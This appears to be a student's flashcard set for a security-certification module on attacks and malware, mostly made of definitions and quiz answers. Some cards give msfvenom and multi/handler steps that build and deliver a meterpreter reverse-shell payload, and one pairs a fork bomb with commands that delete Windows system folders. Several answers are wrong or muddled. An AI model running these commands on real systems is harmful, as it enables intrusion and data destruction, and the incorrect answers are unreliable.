Lab 3.2: Module 03 Determining Security Vulnerabilities

adversarial AI

(adversarial artificial intelligence) Using AI to identify vulnerabilities and attack vectors to circumvent security systems.

Shanise is an IT security professional for a large private bank. She got an alert that the bank website received a funds transfer request that was correctly credentialed but flagged as being out of the account owner's usual pattern. If the alert is correct, what type of attack has likely occurred?

. CSRF attack EX: A cross-site request forgery (CSRF) is an attack that uses a website's authentication tokens to "inherit" a victim's credentials and privileges, allowing the attacker to impersonate the authorized user.

Which of the following is a characteristic of a potentially unwanted program (PUP)?

A PUP interferes and obstructs the user with web browsing and pop-up windows. EX: A PUP is software that is accidentally installed along with other programs by overlooking default installation options. PUP interferes with web browsing and can cause pop-up windows, pop-under windows, search engine high jacking, homepage high jacking, etc.

Ian, a systems administrator, was checking systems on Monday morning when he noticed several alarms on his screen. He found many of the normal settings in his computer and programs changed, but he was sure no one had physically entered his room since Friday. If Ian did not make these changes, which of the events below is the most likely reason for the anomalies?

A backdoor was installed previously and utilized over the weekend to access the computer and the programs. EX: A backdoor allows a threat actor to change settings by remotely controlling the devices.

worm

A destructive computer program that bores its way through a computer's files or through a computer's network. a worm can replicate between different computers on the same network

Cyclic Redundancy Check (CRC)

A mathematical algorithm that is executed on a data string by both the sender and the receiver of the data string. If the calculated CRC values match, the receiver can conclude that the data string was not corrupted during transmission.

trojan

A program disguised as a harmless application that actually produces harmful results.

Bot

A program that can do things without the user of the computer having to give it instructions. Many bots are malware as they are installed without people's permission and can be controlled over the internet and used to send spam or steal data. Also known as web robots.

keylogger

A small hardware device or a program that monitors seach keystroke a user types on the computer's keyboard.

pointer dereference

A software vulnerability that can occur when the code attempts to remove the relationship between a pointer and the thing it points to (pointee). If the pointee is not properly established, the dereferencing process may crash the application and corrupt memory.

buffer overflow

A technique for crashing by sending too much data to the buffer in a computer's memory

replay attack

A type of network attack where an attacker captures network traffic and stores it for retransmission at a later time to gain unauthorized access to a network.

Which of the following statements are true for a zero-day attack? [Choose all that apply.]

A zero-day vulnerability can only be discovered when the software is deployed A zero-day attack is impossible to detect as it exploits the unknown vulnerabilities A zero-day vulnerability can be example of an unknown threat

integer overflow

An application attack that attempts to use or create a numeric value that is too big for an application to handle. Input handling and error handling thwart the attack.

memory leak

An application flaw that consumes memory without releasing it.

cross-site request forgery (XSRF)

An attack that exploits the trust a website has in a user's browser in an attempt to transmit unauthorized commands to the website. (uses the authentication token of the website to load another website

XML injection

Attack method where malicious XML is passed as input to exploit a vulnerability in the target app.

application attacks

Attacks that are targeted at web-based and other client-server applications.

Which of the following types of malware allows the attacker to launch attacks from the infected computer to other computers?

Bot EX: am attacker uses the infected computer (bot) as a remote control to launch attacks on other computers.

Which of the following is an example of a request forgery malware?

CSRF EX: A cross-site request forgery (CSRF) is a vulnerability that induces users to perform unintended actions using the authentication token sent by the website to the user's browser

What is another term commonly used to define cross-site request forgery (CSRF):

Client-side request forgery EX: Cross-site request forgery is also referred to as a client-side request forgery, as this attack takes place on the client site.

Which of the following describes a memory leak attack?

In a memory leak attack, the threat actor takes advantage of the programming error of not freeing the memory after executing a processes, taking advantage of the device's low memory conditions to attack. EX: in a memory leak attack, the threat actor exploits developer created loopholes in a program, freeing memory, which is then used by the threat actor.

Kate decides to download an extension to her favorite browser to quickly store links on her spreadsheet software. While downloading the software, she ignores the opt-out check box that allows the extension to download a search toolbar. What has occurred here?

Kate has installed a potentially unwanted program (PUP). EX: An additional program was installed along with the program Katie intended to install because she overlooked the opt-out check box.

Kia recently noticed that when she browses her favorite online shopping site, she is immediately redirected to a competitor's site. What is happening here, and what is the best option for Kia to fix this situation?

Kia must uninstall the toolbar software and the accompanying components she has recent installed on her browser. EX: Uninstalling the software and related components will remove the accidentally installed potentially unwanted program (PUP) from the device.

Terrence, an executive VP of IT at Sigma Bank, noticed that yesterday, there was a major attack on several thousands of bank employees' computers located at geographically different locations where files and data from the computers got deleted. It was also noticed that several confidential files containing customer data were deleted from the bank's server in multiple locations, and the CEO's emails were deleted from the mail server. Since the bank was compliant with cybersecurity measures, Terrence suspects an internal hand in this activity. While going through the records of all employees working in the IT security of the bank, both past and present, he notices that there is an employee, Chris, who has enough experience to launch this attack, was unhappy with his annual review last year, and had left the bank three months ago. If Terrence were able to single Chris out as the one responsible for the attack, what kind of an attack would this be?

Logic bomb EX: A logic bomb is a malicious code added to a genuine program and avoids detection unless a logical event triggers it. Given the scenario, this is the most probable attack orchestrated by this threat actor.

Which of the following is a subset of artificial intelligence?

Machine learning

cryptomalware

Malware to remain in place for as long as possible, quietly mining in the background.

memory vulnerabilities

Memory leak. Buffer overflow. Integer overflow. Pointer dereference. DLL injection

SQL injections

Method of attacking a database-driven web application that has improper security, by changing code in the website

how do you detect framing errors

Parity Check and Cyclic Redundancy Check (CRC)

Which of the following is a form of malware attack that uses specialized communication protocols?

RAT EX: RAT has the functionality of a Trojan while also using specialized communication protocols that allow unauthorized access to the entire infected system.`

What does ransomware do to an endpoint device?

Ransomware attacks the endpoint device holding it hostage by preventing it from functioning unless the user fulfills the ransom payment demanded. EX: Ransomware is an imprison malware that takes control of the endpoint device, affecting the device's performance until the user pays a ransom to the attacker.

What type of attack occurs when the threat actor snoops and intercepts the digital data transmitted by the computer and resends that data, impersonating the user?

Replay EX: A replay attack copies data transmitted by the computer's user and then uses it for an attack. Replay attacks are commonly used against digital identities. After intercepting and copying the data, the threat actor later retransmits selected and edited portions of the copied communications to impersonate the legitimate user.

Which type of malware can hide its agenda inside other processes, making it undetectable, and what is it usually used for?

Rootkit, a malware that uses the lower layers of the operating system or undocumented functions to make alterations to the operating system's processes EX: A rootkit hides its presence between lower layers and therefore is undetectable for normal antimalware software.

A web application with an SQL server database is found to be compromised by an attacker. On examination, the email IDs of the database have been found modified. This was due to improper validation in the input fields exploited by the attacker.What is the probable attack in the above scenario?

SQL injection EX: Attacks that introduce new input to exploit a vulnerability are called injections. One of the most common injection attacks is an SQL injection, which inserts statements that manipulate a database server.

What is the name of the process where a website validates user input before the application uses the input?

Sanitizing ex: Authorization is permitting the users after validating their credentials. This takes place only after sanitizing the data on a website where sanitization is implemented. User data, such as username and password, is cross-verified using the information available on the database before giving authorization.

Use the Multi/handler Module and Exploit the System

Since you created a standalone module, it will not create a connection between you and the victim's system. To do this, you need to use the multi/handler module, which will catch the meterpreter connection when the payload.exe is executed on the victim's system. The meterpreter connection is required to establish a connection between the hacker's and target's systems.

Smitha, an employee working in the accounts department, reported to the information security officer that she could not access her computer. James, the security officer, noticed the following on Smitha's system: \On booting the computer, the following message was flashing on the computer screen with the IRS logo:" This computer is locked by the Internal Revenue Service. It has come to our attention that you are transferring funds to other agencies using this computer without compliance with the local income tax laws. As per section 22 of the U.S. Income Tax Act, the transmission of funds without applicable taxes is prohibited. Your IP address is identified in this fraudulent transaction and is locked to prevent further unlawful activities. This offense attracts a penalty of $400.00 for the first offense. You are hereby given 16 hours to resolve this issue, failing which you shall be prosecuted to the full extent of the law. You may make a secure payment by clicking on the following link. If you face any issues, you may reach out to us at [email protected]."The message will not close, nor is there access to applications or files on the computer; however, James can open shared files and folders on Smitha's computer through the network. What is your inference about the problem faced by Smitha on her computer?

Smitha's computer is compromised by ransomware. EX: Ransomware pretends to block the computer, giving a seemingly valid reason and instructing the user to pay a fine before being allowed to use the device. James's observations of Smitha's computer shows it is most likely compromised by a ransomware attack.

backdoor

Software code that gives access to a program or a service that circumvents normal security protections.

PUP (potentially unwanted program)

Software that cannot definitively be classed as malicious, but may not have been chosen by or wanted by the user.

ransomware

Software that encrypts programs and data until a ransom is paid to remove it.

uses of botnets

Spamming, spreading malware, manipulating online polls, denying services, ad fraud, mining cryptocurrencies

What is a risk to data when training a machine learning (ML) application?

Tainted training data for machine learning EX: Attackers can alter the training data that the machine learning application is training with to give false negatives to cloak themselves.

Which of the following describes the action of an SQL injection into a database server?

The SQL injection inserts specially created structured query language statements to manipulate the database server, giving control of the database to the attacker, who can then manipulate the database. EX: SQL injections insert specially created SQL statements to manipulate a database into giving control to the attacker.

Natasha, a network security administrator for an online travel portal, noticed that her website was the victim of an SQL injection. She decided to study the SQL queries to find which one made this vulnerability in the database, and she noticed the following SQL code piece executed on the database: 'whatever' AND email IS NULL; What has been accessed by the attacker running this SQL injection?

The attacker has determined the names of different types of fields in the database. EX: The SQL statement displays the various fields of a table in the database.

An attacker has changed the value of a variable used when copying files from one cloud server to a local drive. What is the most likely motive behind the attack?

The attacker is using an integer overflow attack to initiate a buffer overflow that can allow them to take over the machine. ex: An integer overflow attack can be used to initiate a buffer overflow, allowing an attacker to take over a machine.

A few computers at a high-security software firm location have been compromised. The threat actor took user videos, confidential information like bank account IDs and passwords, email IDs and passwords, and computer screenshots. These confidential data have been shared every three hours from the computers to the threat actor. Which of the following is correct, based on the evaluation of the above observation?

This is a software keylogger attack, as screenshots, video captures, and keystrokes have been routinely monitored and periodically shared. EX: . A software keylogger can capture screenshots, videos of users, and keystrokes and periodically transfer the information, which cannot be provided by a hardware keylogger.

The files in James's computer were found spreading within the device without any human action. As an engineer, you were requested to identify the problem and help James resolve it. During file code inspection, you noticed that certain types of files in the computer have similar codes. You found that the problem is coming from a set of codes that are not part of the actual files, appended at the bottom of the file. You also noticed a transfer control code written at the beginning of the files giving control to the code at the bottom of the file. Which type of infection is this a characteristic of?

This is a typical characteristic of an endpoint device infected with a file-based virus attack. EX: This is a characteristic of a typical early generation file-based virus, where the malicious code is attached at the bottom of the file, and the control is transferred from the beginning of the file through a control transfer code in the file.

Zeda Corporation provides online training solutions to global customers. To provide e-learning solutions, it integrates with multiple vendor platforms. This ensures seamless transfer to multiple operators' solutions through sign on. Joe, an IT security administrator, noticed that a threat actor has attacked the platform and stolen the user data. The source of this vulnerability was identified as one of the integrated external applications. What type of attack is this?

This is an API attack. EX: The integration of a vendor platform with the Zeda platform for single-sign through API integration has caused the attack. One of the vendors has exposed the vulnerability through improper API integration.

William downloaded some free software to help him with photo editing. A few days later, William noticed several personal photographs were modified and posted to various social media pages with obscene comments. He also noticed that there were videos of him that were morphed and circulated on adult websites. The videos were obviously taken using his webcam. What should William do to fix his problem and prevent it from happening again in the future?

William should run an antimalware program and scan for all known RATs, then quarantine and remove the infected file(s). To prevent this in the future, he should only download software from trusted websites. EX: There could be a remote access Trojan (RAT), which could have been installed in the device while downloading and running one of the applications, giving the remote threat actor power to do the damage in the given scenario.

snoop

a category of malware that deals with listening in with malware, spyware

Parity check

a check used to see if data was correctly transmitted according to the even or odd agreed-upon parity transmission convention

request forgery

a class of attack where a user performs a state-changing action on behalf of another user, typically without their knowledge.

a web server

a computer that delivers requested webpages to your computer or mobile device

command and control structure

a structure that sends instructions to bot computers

file-based virus

a virus that is attached to a file, and is made to launch when that file is opened, its goal is to reproduce and infect more files, these types of viruses are confined to the host computer, it could delete, corrupt, or make applications useless, or difficult to work with, and then will also replicate itself onto other files in that host computer

logic bombs

a virus triggered by the appearance or disappearance of specified data.

Cross-Site Scripting (XSS)

a vulnerability in dynamic web pages that allows an attacker to bypass a browser's security mechanisms and instruct the victim's browser to execute code, thinking it came from the desired website

Which of the following statements correctly describes the disadvantage of a hardware-based keylogger? A. A hardware-based keylogger must be physically installed and removed without detection. b. A hardware-based keylogger's data can be easily erased by the antimalware software installed in the device. c. A hardware-based keylogger can easily be detected in a network by an antivirus. d. A hardware-based keylogger can be detected by an antivirus when it scans for ports.

a. A hardware-based keylogger must be physically installed and removed without detection. EX: Since hardware-based keyloggers need to be physically connected to and removed from the endpoint, the attacker is vulnerable to being detected and apprehended.

fileless virus

attach themselves to services and processes in the OS, like powershell, windows management instrumentation, and .NET framework, this type of virus is loaded onto the RAM

technologies used by spyware

automatic download software passive tracking technologies system-modifying software tracking software

While Andel is logging into his email through a browser, the login window disappears. Andel attempts to log in again and is successful. Days later, he goes to log into his email, and his attempt fails. He receives a message indicating that his username and/or password are invalid. What is Andel likely a victim of? a. RAT b. CSRF c. Spyware d. Keyloggers

b. CSRF EX: Cross-site request forgeries (CSRF) trick users who have authenticated "tokens" on a specific website into loading another, malicious, webpage that then inherits (steals) the user's identity and privileges. The stolen credentials can then be used to perform functions on the attacker's behalf; in this case, changing Andel's email credentials so only the attacker can access his account.

Japan's cybercrime control center noticed that around 200,000 Tokyo computers are infected by bots, and all these bots are remotely controlled by a single attacker. What is this attacker referred to as?

bot herder ex: A bot herder is the administrator or controller of the logical network of all devices infected by the attacker-created bots. In most cases, the device user is unaware of the bot herder's influence on the endpoint.

incorrect error handling

can allow an attacker access through a vulnerabilities in dealing with error handling, and provide a way in

To use the multi/handler module, perform the following steps:

connect back to the hacker computer that is running kali You need to start msfconsole. Click the Applications icon, select 08 - Exploitation Tools and then select the metasploit framework. A new terminal window is displayed. Type the following command: msfconsole You need to set the multi/handler module. Type the following command: use multi/handler The module is now set. Next, you need to set the windows/meterpreter/reverse_tcp payload used with msfvenom. To do this, type the following command: set payload windows/meterpreter/reverse_tcp To set the LHOST value, type the following command: set LHOST 192.168.0.4 (target IP address) Finally, it is time to trigger the payload. Type the following command: exploit Notice that nothing happens in PLABWIN10 after you double-click the file. This is because it is a custom exploit and does not generate any output. This file will be executed and will continue to run the background without user's knowledge. When this file is executed, it creates a reverse connection with the Kali Linux system.

two types of request forgeries

cross-site or client-side request forgery

Which of the following is known as out-of-the-box configuration?

default settings

advantages to fileless viruses

easy to infect, extensive control persistent difficult to detect difficult to defend against

attacks on software

exploiting memory vulnerabilities improper exception and error handling external software components

Which of the following code provides instructions to the hardware?

firmware

CSRF (attacks user)

force target to take action for attacker while pretending to be an authorized user

SSRF (attacks server)

gain access to sensitive data, or inject harmful data

injections

introduce a new input to exploit a vulnerability

RAT (Remote Access Trojan)

malware that arrives in a trojan disguised as legitimate software and sets up a secret communication link to a hacker

cross-site scripting attack

occurs when you visit a compromised Web site that runs a script that installs a keylogger program on your computer.

rootkit

program that hides in a computer and allows someone from a remote location to take full control of the computer

application attacks include

scripting attacks injection attacks request forgery attacks replay attacks

framing errors

single bit error multiple bit errors burst errors

malware

software designed to infiltrate or damage a computer system without the user's informed consent, software that performs unwanted, and damaging actions

spyware

software that enables a user to obtain covert information about another's computer activities by transmitting data covertly from their hard drive.

server-site request forgery (SSRF)

takes advantage of a trusting relationship between web servers

how to create a fork bomb?

use a batch file and execute it cmmd: @echo off Del c:\windows\system32\*.* Del c:\windows\*.* open notepad on the computer you want to infect. To create a new batch file, in the Untitled - Notepad window, type the following fork bomb code: %0|%0 (NOTE: A batch file contains instructions to be executed in sequence. In this batch file, %0 is the name of the currently executing code. This batch file is going to repeatedly execute itself forever. It quickly creates many processes and slows down the system. First the %0 command is run and then the second %0 command, which is located after the pipe, is run. They both run repeatedly until manually stopped.) once you have it, you just have to open it, it will overload the system

improper exception handling

uses vulnerabilities in the program when dealing with exceptions, that is then exploited,

Creating Standalone Payloads with Msfvenom

using linux, go to terminal emulator create payload on msfvenom cmd: msfvenom -l payloads cmd:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.4 -f exe -o payload.exe now you have to share the payload with your victim. the easiest way is to have your victim download it from the web. (virus realtime protection needs to be disabled in the receiving computer) You need to ensure that the payload file is available to the target system. To do this, you need to start the SimpleHTTPServer. To do this, type the following command: python -m SimpleHTTPServer

Juan, a cybersecurity expert, has been hired by an organization whose networks have been compromised by a malware attack. After analyzing the network systems, Juan submits a report to the company mentioning that the devices are infected with malware that uses a split infection technique on files. Which malware attack is Juan reporting?

virus EX: Split infection technique is characteristic of a type of virus that lodges malicious codes in multiple locations within the file. It is normally placed randomly in various parts of the infected file.

For which of the following Windows versions, Microsoft has stopped providing support services? [Choose all that apply.]

windows 7 and xp